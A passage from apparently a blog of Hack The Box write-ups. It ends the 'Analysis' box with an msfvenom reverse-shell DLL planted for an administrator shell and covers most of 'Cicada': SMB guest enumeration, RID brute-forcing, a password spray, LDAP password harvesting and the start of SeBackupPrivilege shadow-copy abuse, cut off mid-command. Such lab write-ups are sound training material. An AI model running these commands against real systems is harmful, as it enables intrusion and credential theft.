snort_dynamicpreprocessor AUTORITE NT\SystŠme:(I)(OI)(CI)(F) BUILTIN\Administrateurs:(I)(OI)(CI)(F) BUILTIN\Utilisateurs:(I)(OI)(CI)(RX) BUILTIN\Utilisateurs:(I)(CI)(AD) BUILTIN\Utilisateurs:(I)(CI)(WD) CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F) Successfully processed 1 files; Failed processing 0 files</code></pre></div> <p>I generated a reverse shell DLL using <code class="language-text">msfvenom</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.53 LPORT=443 -f dll -o shell.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 9216 bytes Saved as: shell.dll</code></pre></div> <p>I then started a listener with <code class="language-text">nc</code> and uploaded the DLL:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Snort\lib\snort_dynamicpreprocessor> upload shell.dll Info: Uploading /home/kali/Desktop/HTB/Analysis/shell.dll to C:\Snort\lib\snort_dynamicpreprocessor\shell.dll Data: 12288 bytes of 12288 bytes copied Info: Upload successful!</code></pre></div> <p>After about a minute, <code class="language-text">nc</code> caught a shell as <code class="language-text">administrateur</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.53] from (UNKNOWN) [10.10.11.250] 51554 Microsoft Windows [Version 10.0.17763.5329] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami analysis\administrateur C:\Windows\system32>cd \users\administrateur\desktop cd \users\administrateur\desktop C:\Users\Administrateur\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 0071-E237 Directory of C:\Users\Administrateur\Desktop 01/10/2024 11:41 AM &lt;DIR> . 01/10/2024 11:41 AM &lt;DIR> .. 06/12/2025 08:29 PM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 4,131,143,680 bytes free</code></pre></div>https://mgarrity.com/hack-the-box-cicada/https://mgarrity.com/hack-the-box-cicada/Sat, 07 Jun 2025 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/13800c6c19fcb361f552cb7ec6f4e678/3b67f/cicada.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABA0lEQVR42mMQkdX+jxPLaf8Xltb+zy8OpGW0/4vK4VELxQy4JECaBSS0/ksqav1XM9T8LyGvCeQTNpQBn2HqZnr/7VPs/ltkh/x3KvD8r26q919QEr+hWA0UltX5Lymj9t+pIeS/9cGj/5U6F//XOn/xv3N75H8JSdX/wnI6JBgIdp32f3UTnf9mkQ7/FdYe+K+wc91/kVU7/5um+vxX1QPK43EldhcCI0BSWfe/U6zRf07v8P8MlT3/udzD/jsnmv6XUNQBy5MRhtr/1Yx1/3vlO/13qkn+7wmkQXxCEYM3lgWBmsXltf4r62qBaZBhInJkJhuYoSLACBKU1gEbREw6BABAsATL59NIugAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Cicada" title="" src="/static/13800c6c19fcb361f552cb7ec6f4e678/50637/cicada.png" srcset="/static/13800c6c19fcb361f552cb7ec6f4e678/dda05/cicada.png 158w, /static/13800c6c19fcb361f552cb7ec6f4e678/679a3/cicada.png 315w, /static/13800c6c19fcb361f552cb7ec6f4e678/50637/cicada.png 630w, /static/13800c6c19fcb361f552cb7ec6f4e678/fddb0/cicada.png 945w, /static/13800c6c19fcb361f552cb7ec6f4e678/3b67f/cicada.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Cicada is a Windows machine running Active Directory with an open SMB share that contains a default password. Usernames can be enumerated by brute-forcing RIDs, which can then be used to run a password spray, resulting in valid credentials for the user <code class="language-text">michael.wrightson</code>. This allows for authentication to the LDAP server to obtain AD info, leading to the discovery of another password stored in the description field of the <code class="language-text">david.orelious</code> user. These credentials grant access to the <code class="language-text">DEV</code> SMB share, which contains a PowerShell script that reveals the password for the <code class="language-text">emily.oscars</code> user, a member of <code class="language-text">Backup Operators</code>. Membership in this group can be leveraged to create a shadow copy of the <code class="language-text">C</code> drive, providing access to the <code class="language-text">ntds.dit</code> database and <code class="language-text">SYSTEM</code> registry hive. These can then be used to extract user NTLM hashes, resulting in a shell as the <code class="language-text">administrator</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ nmap -sC -sV -Pn -oA nmap/output 10.10.11.35 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-05 12:46 EDT Nmap scan report for 10.10.11.35 Host is up (0.045s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-05 22:05:19Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: 5h19m06s | smb2-time: | date: 2025-06-05T22:06:09 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 93.60 seconds</code></pre></div> <p>I added <code class="language-text">cicada.htb</code> and <code class="language-text">CICADA-DC.cicada.htb</code> to <code class="language-text">/etc/hosts</code>. Guest access was enabled on SMB, and the <code class="language-text">HR</code> share was readable:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ netexec smb 10.10.11.35 -u 'a' -p '' --shares SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest) SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share</code></pre></div> <p>I used <code class="language-text">netexec</code> to spider the shares:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ netexec smb 10.10.11.35 -u 'a' -p '' -M spider_plus SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$'] SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk'] SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json". SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 2 (HR, IPC$) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 0 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 1 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.24 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 1.24 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 1.24 KB</code></pre></div> <p>The <code class="language-text">HR</code> share contained the following:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">{ "HR": { "Notice from HR.txt": { "atime_epoch": "2024-08-28 13:31:48", "ctime_epoch": "2024-03-14 08:29:03", "mtime_epoch": "2024-08-28 13:31:48", "size": "1.24 KB" } } }</code></pre></div> <p>I added <code class="language-text">-o download_flag=true</code> to the above <code class="language-text">netexec</code> command to download the share.</p> <p><code class="language-text">Notice from HR.txt</code> revealed a default password used for new hires:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Dear new hire! Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure. Your default password is: Cicada$M6Corpb*@Lp#nZp!8 To change your password: 1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. 2. Once logged in, navigate to your account settings or profile settings section. 3. Look for the option to change your password. This will be labeled as "Change Password". 4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. 5. After changing your password, make sure to save your changes. Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password. If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb. Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team! Best regards, Cicada Corp</code></pre></div> <p>Guest access was restricted when using the <code class="language-text">--users</code> option in <code class="language-text">netexec</code> to enumerate users:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ netexec smb 10.10.11.35 -u 'a' -p '' --users SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)</code></pre></div> <p>However, I was able to enumerate usernames by using the <code class="language-text">--rid-brute</code> option, which iterates through possible RID values appended to the domain SID; this process identifies valid SIDs and reveals their corresponding account names:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ netexec smb 10.10.11.35 -u 'a' -p '' --rid-brute SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest) SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)</code></pre></div> <p>Based on the SidTypeUser accounts from the output, I created a list of usernames:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">john.smoulder sarah.dantelia michael.wrightson david.orelious emily.oscars</code></pre></div> <p>I used <code class="language-text">netexec</code> to run a password spray, which resulted in a valid password for <code class="language-text">michael.wrightson</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ netexec smb 10.10.11.35 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE</code></pre></div> <p>With valid user credentials, I was able to authenticate to LDAP to get domain info with <code class="language-text">ldapsearch</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ ldapsearch -x -H ldap://10.10.11.35 -D "michael.wrightson@cicada.htb" -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "dc=cicada,dc=htb" > ldap_output</code></pre></div> <p>After looking through the output, I found a password in the description field of the <code class="language-text">david.orelious</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">&lt;...snip...> # David Orelious, Users, cicada.htb dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: David Orelious sn: Orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3 &lt;...snip...></code></pre></div> <p>These credentials provided access to the <code class="language-text">DEV</code> share:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ netexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV READ SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share</code></pre></div> <p>I used <code class="language-text">netexec</code> to spider the shares:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ netexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -M spider_plus SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$'] SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk'] SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV READ SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json". SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 5 (DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 33 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 12 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.09 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 23 B SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 5.22 KB</code></pre></div> <p>The <code class="language-text">DEV</code> share contained the following:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">{ "DEV": { "Backup_script.ps1": { "atime_epoch": "2024-08-28 13:28:22", "ctime_epoch": "2024-03-14 08:31:38", "mtime_epoch": "2024-08-28 13:28:22", "size": "601 B" } }, &lt;...snip...></code></pre></div> <p>I downloaded the share by adding <code class="language-text">-o download_flag=true</code> to the above <code class="language-text">netexec</code> command.</p> <p><code class="language-text">Backup_script.ps1</code> revealed the credentials for <code class="language-text">emily.oscars</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">$sourceDirectory = "C:\smb" $destinationDirectory = "D:\Backup" $username = "emily.oscars" $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format "yyyyMMdd_HHmmss" $backupFileName = "smb_backup_$dateStamp.zip" $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"</code></pre></div> <p>Using <code class="language-text">evil-winrm</code>, I obtained a shell as <code class="language-text">emily.oscars</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Cicada] └─$ evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami cicada\emily.oscars *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> ls Directory: C:\Users\emily.oscars.CICADA\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 6/5/2025 4:22 PM 34 user.txt</code></pre></div> <p>This user was a member of <code class="language-text">Backup Operators</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288</code></pre></div> <p>Members of the <code class="language-text">Backup Operators</code> group are granted the <code class="language-text">SeBackup</code> and <code class="language-text">SeRestore</code> privileges:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled</code></pre></div> <p>Users with <code class="language-text">SeBackupPrivilege</code> can create a shadow copy of the entire drive. This enables traversal of any directory, listing of folder contents, and copying of any file regardless of explicit access rights. This privilege can be exploited to obtain sensitive files such as the <code class="language-text">ntds.dit</code> database and the <code class="language-text">SYSTEM</code> registry hive. These files can then be copied locally to extract NTLM hashes with <code class="language-text">impacket-secretsdump</code>.</p> <p>The <code class="language-text">diskshadow.exe</code> utility can be used to create a disk shadow copy, although I couldn't enter commands directly into <code class="language-text">diskshadow.exe</code> since commands run through <code class="language-text">evil-winrm</code> execute within the context of the non-interactive <code class="language-text">wsmprovhost</code> process, indicated by the session ID (<code class="language-text">SI</code>) of <code class="language-text">0</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> $PID 996 *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> get-process Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- &lt;...snip...> 3816 29 121000 138444 1.38 996 0 wsmprovhost &lt;...snip...></code></pre></div> <p><code class="language-text">diskshadow.exe</code> can also run commands from a script file, enabling non-interactive execution. I created the script (<code class="language-text">diskshadow.txt</code>) with the following content in <code class="language-text">C:\windows\temp</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii *Evil-WinRM* PS C:\windows\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append *Evil-WinRM* PS C:\windows\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append *Evil-WinRM* PS C:\windows\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append</code></pre></div> <p>Using <code class="language-text">diskshadow.exe</code> along with <code class="language-text">diskshadow.txt</code>, I created a shadow copy of the <code class="language-text">C</code> drive exposed as <code class="language-text">z</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> diskshadow.exe /s 